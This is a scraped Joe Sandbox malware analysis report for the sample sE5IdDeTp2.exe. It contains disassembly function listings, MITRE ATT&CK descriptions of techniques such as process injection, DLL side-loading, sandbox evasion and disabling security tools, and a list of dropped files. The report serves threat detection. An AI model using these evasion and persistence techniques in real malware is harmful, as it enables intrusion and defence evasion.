Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e92adf0101e68eae878a29a6c6743d1c6ce4639753d8104e5182ae5fd00c9144
Instruction ID: 16fe945cd8358327b7afe2952afbb0beabb72d7ec9038d4f7e06274c5d1ddd41
Opcode Fuzzy Hash: e92adf0101e68eae878a29a6c6743d1c6ce4639753d8104e5182ae5fd00c9144
Instruction Fuzzy Hash: 4C516CB2601F4482EF2ACF5BE4547A9B7A1E758FC4F048122DB9E07774DB39C0968204

Function 000000014004C0B0 Relevance: 6.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 000000014004C1F9

Part of subcall function 000000014004C530: malloc.MSVCRT ref: 000000014004C606

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 9569ff80a69a4fbce519bc7824c1840e235d2b7f1c5e15126076b90d55c0807e
Instruction ID: 9a4aa4d4c417048e1c7fefbe7b44f1e7d26392780cfe58122c5be5bc23e21e19
Opcode Fuzzy Hash: 9569ff80a69a4fbce519bc7824c1840e235d2b7f1c5e15126076b90d55c0807e
Instruction Fuzzy Hash: 6051CE32322B8095EA9A9B62E640BE927A4F70CBC4F064631EF5C0B3A1DFB4D565C314

Function 0000000140059030 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 000000014005907A
realloc.MSVCRT ref: 00000001400590DC
memcpy.MSVCRT ref: 00000001400590F6
realloc.MSVCRT ref: 000000014005912E

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: b577786df6d3fc2fef0789da10c5e0cd41edd13a816520024f72584ecf335e30
Instruction ID: ed6965fc9425ba4e87e3e873ea7763674bc0c3ae99546a056840e5a927e47064
Opcode Fuzzy Hash: b577786df6d3fc2fef0789da10c5e0cd41edd13a816520024f72584ecf335e30
Instruction Fuzzy Hash: CE3130B2702F4582EE2ADF57F994399A361EB5CBC4F048521DB9E077A1EF39D4918340

Function 000000014003D040 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014003C780: strcmp.MSVCRT ref: 000000014003C6E9
Part of subcall function 000000014003C780: _strdup.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000014002CAAF), ref: 000000014003C6F5
Part of subcall function 000000014003C780: setlocale.MSVCRT ref: 000000014003C70A

strftime.MSVCRT ref: 000000014003D0A5
setlocale.MSVCRT ref: 000000014003D0B9
free.MSVCRT ref: 000000014003D0C8

Part of subcall function 000000014003C570: fsetpos.MSVCRT ref: 000000014006116A

Part of subcall function 000000014003C780: setlocale.MSVCRT ref: 000000014003C743
Part of subcall function 000000014003C780: free.MSVCRT ref: 000000014003C751

Part of subcall function 000000014003A6C0: fflush.MSVCRT ref: 000000014003A6FF
Part of subcall function 000000014003A6C0: RtlUnwindEx.KERNEL32 ref: 000000014003A816
Part of subcall function 000000014003A6C0: fflush.MSVCRT ref: 000000014003A876
Part of subcall function 000000014003A6C0: abort.MSVCRT ref: 000000014003A87B

memset.MSVCRT ref: 000000014003D146

Part of subcall function 000000014003D170: localeconv.MSVCRT ref: 000000014003D1FA
Part of subcall function 000000014003D170: localeconv.MSVCRT ref: 000000014003D202
Part of subcall function 000000014003D170: strlen.MSVCRT ref: 000000014003D2C5

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: setlocale$fflushfreelocaleconv$Unwind_strdupabortfsetposmemsetstrcmpstrftimestrlen
String ID:
API String ID: 722154204-0
Opcode ID: ab94e32acd7199979b81e781678e504c9f54c409b858d09f5ea2fcb96d1ef018
Instruction ID: f0308cdcbd91eddc391a2e8607cb7dfbca1c475c9b5a4b8c050026a1cb4abbdc
Opcode Fuzzy Hash: ab94e32acd7199979b81e781678e504c9f54c409b858d09f5ea2fcb96d1ef018
Instruction Fuzzy Hash: EA21C37231859441FA27AB23B442BDB6311AB99FD4F088521BF8D47BBBEE3CC5428740

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sE5IdDeTp2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wumqal2.3st.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25jyogrn.avg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2d4aol10.udy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2em5h0sq.jsr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3f3zik5z.jsc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3y221ybc.1pp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40prao3n.ggw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4o1bfzpi.t5o.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ihk22f1.ppz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nldbobp.4hp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3geh2p3.1mm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbxp4cen.rtv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duqdqyxv.2ub.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvtlrfrr.tcw.ps1

Windows Analysis Report
sE5IdDeTp2.exe